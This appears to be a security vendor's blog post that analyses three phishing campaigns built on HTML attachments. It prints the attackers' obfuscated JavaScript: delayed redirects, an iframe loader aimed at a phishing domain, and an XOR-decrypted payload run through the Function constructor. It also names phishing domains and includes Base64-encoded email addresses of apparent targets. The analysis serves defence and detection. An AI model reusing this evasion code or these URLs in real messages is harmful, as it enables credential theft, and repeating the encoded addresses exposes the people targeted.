How HTML and JavaScript Fuel Modern Phishing: 3 Real-World Examples

Phishing attacks have evolved far beyond simple malicious links. Today’s cybercriminals leverage HTML and JavaScript to craft malicious emails that look real, behave dynamically, and often bypass both user suspicion and traditional detection tools.

Modern attackers combine social engineering with advanced obfuscation and legitimate infrastructure, creating multi-layered deceptions that build trust with users while exploiting the smallest gaps in organizational defenses.

In this blog, we examine three real-world phishing campaigns that use HTML and JavaScript in distinct but equally deceptive ways—highlighting the tactics behind each attack and the techniques that make them so difficult to detect.

Key Attack Insights

• Filename manipulation creates false legitimacy through familiar extensions

• Delayed execution helps bypass automated security scanning

• Sender spoofing exploits recipient trust and curiosity

Attack Overview

This campaign demonstrates how attackers weaponize curiosity and urgency. The attack begins with a seemingly innocuous file attachment named “Play_VM-Now[redacted]VWAV.htm,” crafted to look like a legitimate voicemail audio file. The filename cleverly includes terms like “VM” and “WAV” to suggest it contains a voicemail message, while the unfamiliar “.VWAV” extension reinforces the deception by mimicking a common audio file type.

Once opened, the HTML file silently redirects the victim to a phishing site—https://reminder.itmixneth[.]xyz—using JavaScript that activates after a three-second delay, allowing it to evade static scanning engines that don’t analyze delayed behavior. The page itself contains minimal visible content, increasing its stealth and reducing suspicion.

Notably, the email appears to be sent from the recipient’s own address, a tactic that not only circumvents traditional filtering but also exploits the user’s curiosity and concern over potential account misuse. The use of a .xyz top-level domain, frequently abused in phishing due to low registration costs and lax verification, further points to the attacker’s intent to sidestep detection while maintaining credibility.

Technical Implementation

The JavaScript within this HTML file employs basic but effective obfuscation techniques.

The core functionality stores redirect strings in an array containing["location", "https://reminder.itmixneth[.]xyz/?t=", "setTimeout", "window"] and uses a mapping function with hexadecimal index shifting. The code also contains an unused hexadecimal offset function (0x6c), suggesting automated obfuscation tools were used rather than manual crafting.

// Line 1-2: Variable declarations and obfuscation
var rh13z8jemt = "aGFubmFoLnNtaXRoQHNvdXRod2lyZS5jb20";
var _0x2b4c = ["location", "https://reminder.itmixneth[.]xyz/?t=", 
 "setTimeout", "window"];

The malicious code stores URL components in variables, with one variable (_0x1a9f) serving as a decoy to increase code complexity and hinder analysis. This variable contains unused data that serves no functional purpose in the attack's execution.

// Line 3-4:Index mapping and decoy variable
var _0x6b4d = (_0x6c3) => {return _0x2b4c[_0x6c3-0x6c]};
var _0x1a9f = (0x6c = _0x2b4c ? 329102 : ""); // Decoy variable

The primary malicious payload occurs in the final section of the code, where a timeout function redirects the user to a malicious site after a brief delay:

// Line 5-7: Malicious redirect with delay
window[_0x6b4d(0x6e)](function() {
 window[_0x6b4d(0x6c)] = _0x6b4d(0x6d) + rh13z8jemt;
}, 3000); // 3-second delay to evade detection

Detection and Defense Strategies for Delayed Redirects

• Implement dynamic analysis that executes JavaScript for several seconds

• Monitor for delayed network requests in email attachments

• Flag suspicious file extensions that mimic legitimate formats

Key Attack Insights

• Professional impersonation leverages corporate hierarchy and urgency

• Extended loading sequences create realistic user experience while evading detection

• Error handling ensures attack success across different environments

Attack Overview

This attack blends professional authority impersonation with technical sophistication to create a convincing and multi-layered deception. The sender poses as “Mr. Morgan – Operations Manager,” leveraging an internal title to project legitimacy, while the email content reinforces credibility through corporate language such as “Strategic Alignment Session,” “stakeholder alignment,” and “deliverables.”

A key element of the social engineering strategy is the inclusion of a legitimate VCALENDAR attachment for a supposed “Project Management Meeting,” complete with realistic agenda items like “Project overview,” “Team roles,” and “Key milestones.” The invitation emphasizes “essential participation” and sets a 2-day response window, introducing a sense of urgency that pressures recipients into acting quickly.

The infrastructure demonstrates advanced planning. The malicious domain 6f7f4agln0u33.athena-technologies[.]com.my uses a randomized subdomain to circumvent reputation-based filters while the legitimate-sounding root domain impersonates a tech company. Additional evasion techniques include using a non-standard port (8443) to further avoid conventional filtering tools.

Red flags include a DMARC authentication failure, suggesting domain spoofing, and a geographic mismatch—a Netherlands-based IP address tied to a domain registered in Canada—both pointing to the attack's fraudulent nature.

Technical Implementation

The attack employs complex visual and technical deception designed to mimic legitimate Microsoft services. The HTML attachment mimics a Microsoft Teams startup interface with an authentic Microsoft logo and styling. The splash screen uses an animated progress bar and "Loading..." text to create a realistic delay while preparing the malicious redirect, building trust through high-quality HTML/CSS that matches the authentic styling of the brand.

The script uses dynamic iframe manipulation to load external content from a malicious domain into the visible page container, giving the appearance of a legitimate embedded Microsoft Teams interface. The attack initiates immediately upon loading, checking document readiness states before executing the primary payload. When the document reaches an interactive or loaded state, the script triggers the loadTargetUrl function, which constructs and injects the malicious URL into an embedded iframe.

The script immediately constructs the malicious URL by generating randomized URL components, including a unique query key to increase uniqueness and reduce signature-based detection, along with a Base64-encoded email address (e.g., "YmhpcnRAc291bmRjdS5jb20=") as a parameter for tracking or target-specific page generation.

The construction process implements a 25-second timeout that serves multiple strategic purposes: it allows the legitimate-appearing Microsoft Teams interface to fully render before user interaction, provides time for any security scanning to complete, creates the impression of authentic server communication delays, and monitors iframe loading to display a fallback message if the request stalls or fails.

// Line 1-10: URL construction and timeout setup
function loadTargetUrl() {
 try {
 var randomParam = Math.random().toString(36).substring(2);
 var targetUrl = "https://6f7f4agln0u33.athena-technologies.com.my:8443/impact?" +
 encodeURIComponent(randomParam) + "=" +
 encodeURIComponent("YmhpcnRAc291bmRjdS5jb20=");
 
 // 25-second timeout for complete loading sequence
 loadTimeout = setTimeout(function() {
 if (!fallbackTriggered) {
 fallbackTriggered = true;
 showError('Connection timeout. Server may be unavailable.');
 }
 }, 25000);

The dynamic URL construction creates additional obfuscation by generating randomized parameters and encoding Base64 data, making the malicious domain appear as a legitimate Microsoft server during the simulated loading process.

// Line 11-20: Event listeners and iframe manipulation
 frameElement.onload = function() {
 clearTimeout(loadTimeout);
 showContent();
 };
 
 frameElement.onerror = function() {
 clearTimeout(loadTimeout);
 if (!fallbackTriggered) {
 fallbackTriggered = true;
 showError('Failed to load content. Please check your connection.');
 }
 };
 
 frameElement.src = targetUrl;
 } catch(e) {
 showError('System error: ' + e.message);
 }
}

Unlike simpler HTML attacks, the implementation incorporates comprehensive error-handling mechanisms to ensure consistent execution across different browser environments. The primary failure point would be if the iframe throws an error; otherwise, it should successfully display the malicious site to the user.

Following this simulated sequence, the attack prompts the user to click a "try again" button, which generates and redirects to a malicious domain.

Detection and Defense Strategies for iframe Manipulation

• Analyze iframe sources in HTML attachments

• Check for non-standard ports in embedded URLs

• Verify geographic consistency between domains and IP addresses

Key Attack Insights

• XOR encryption provides sophisticated obfuscation that bypasses signature detection

• Legitimate API abuse makes malicious code execution appear benign

• Trusted infrastructure (Amazon SES) provides authentication legitimacy

Attack Overview

This attack targets the construction industry by exploiting routine B2B payment workflows and impersonating a “project accountant” to deliver a phishing payload disguised as a “Final Conditional Lien Waiver.” The email references a specific payment number (#42545) with an unusual $0.00 amount, piquing curiosity and prompting recipients to open the attached document.

By mimicking the appearance and language of standard accounts payable communications, the email capitalizes on familiar financial processes to build trust. It features professional HTML formatting, complete with company branding and authentic invoice design, reinforcing its legitimacy to business users.

Beyond its polished appearance, the attack demonstrates technical sophistication. It uses XOR-based JavaScript obfuscation, combining hex encoding with a repeating XOR key—a method that makes analysis difficult while avoiding detection.

One of the most deceptive aspects is its use of legitimate infrastructure. The email is sent through Amazon SES (IP 54.240.8.241) and successfully passes SPF and DKIM checks, giving it the appearance of a trusted communication. However, closer inspection reveals authentication anomalies, such as a Reply-To domain that differs from the sender, indicating potential spoofing tactics.

Technical Implementation

This attack represents the most technically advanced campaign analyzed in this article, employing expert-level obfuscation that makes detection extremely difficult. The primary attack payload is contained within an encrypted value, with the code performing decryption and storing the result in another variable for execution.

The implementation utilizes XOR cipher encryption with a hex-encoded payload and a repeating key. XOR encryption works by combining each character of the encrypted data with a repeating key using the XOR operation. For example, if the key is "abc" and we want to encrypt "hello", each letter gets XORed with the corresponding key character (h^a, e^b, l^c, l^a, o^b). The same operation, using the same key, reverses the encryption.

The JavaScript manually decodes a hex-encoded string by iterating over each character pair, converting them into byte values using character code math (rather than typical parseInt methods), and XORs each resulting byte with a repeating key. This low-level decoding approach bypasses signature-based hex string detection and avoids the use of obvious decoding functions.

// Line 1-4: Email target and cipher initialization
L = "$target@email.com";
(() => {
 const h = "9d14aa06dc523e5badab0ebe"; // XOR key
 const O = "49114b4e0d04100b44383838140d41454d0415125049401603461d164e4e121a041750521f055a4c014801015e054e475f1d131801024a564803541c5349121014434d451f0f45491b5075164d465a17434f1743054719400c57434e5015520515467c7d434d12594b41196f1d0f5a0b0f4c4340195e6812500a555b164f5c590702415b5c0b1b0a130107420d451210431e5d514a2d0b";

// Line 5-10: XOR decryption process
 const l = Array(O.length / 2).fill().map((_, v) => {
 const B = O.charCodeAt(v * 2), C = O.charCodeAt(v * 2 + 1);
 const x = ((B > 57 ? B - 87 : B - 48) << 4) | (C > 57 ? C - 87 : C - 48);
 return String.fromCharCode(x ^ h.charCodeAt(v % h.length));
 }).join('');

Rather than using obvious execution methods like eval() or setTimeout(), the attack leverages object method calls and legitimate API abuse. The execution occurs through object valueOf() methods triggered by the Intl.RelativeTimeFormat API, making the malicious execution appear benign to static analysis tools.

When A.formatToParts(S, 'day') is called, it automatically invokes the valueOf method, which uses the Function constructor to convert the decrypted string into executable code and redirects the user's browser to the reconstructed malicious URL.

// Line 11-15: Indirect execution through legitimate API
 const A = new Intl.RelativeTimeFormat('en', { numeric: "auto" });
 const S = { valueOf: () => { (0, Function)(l)(); return 0; } };
 A.formatToParts(S, 'day'); // Triggers valueOf() method
})();

Upon execution, the XOR decryption process reveals the final payload stored in variable `l`. The decrypted content contains JavaScript instructions that dynamically construct a malicious URL by concatenating array elements.

// Decrypted payload content
l = "puzzle = ['ht',`tp`,\"s:\",\"//\",`te`,`o.`,`cn`,\"fy\",`cz`,`a.`,'ru','/j',\"4D\",'j!',\"q6\",\"m3\",`p0`,\"MI\",\"o/\",].join(\"\");
window.location.href = puzzle+L;"

Detection and Defense Strategies for XOR Encryption

• Detect hex-encoded strings combined with XOR operations

• Monitor for indirect execution methods using legitimate APIs

• Analyze authentication mismatches between sender and reply-to domains

Modern phishing is less about brute-force trickery and more about precision-crafted deception. Threat actors are no longer relying solely on malicious links or attachments—they’re embedding functionality directly into the message itself, using legitimate-looking formats and obfuscated JavaScript to slip past defenses. And because these attacks are engineered to blend in with everyday workflows, even the most cautious employees can be fooled.

Understanding how these techniques work is a critical step toward stopping them. Because when an email looks normal, acts urgent, and evades traditional detection, only a deeper understanding of context and behavior can uncover what’s hiding beneath the surface.

To learn more about the advanced attacks targeting your organization, download our report, Inbox Under Siege: 5 Email Attacks You Need to Know for 2025.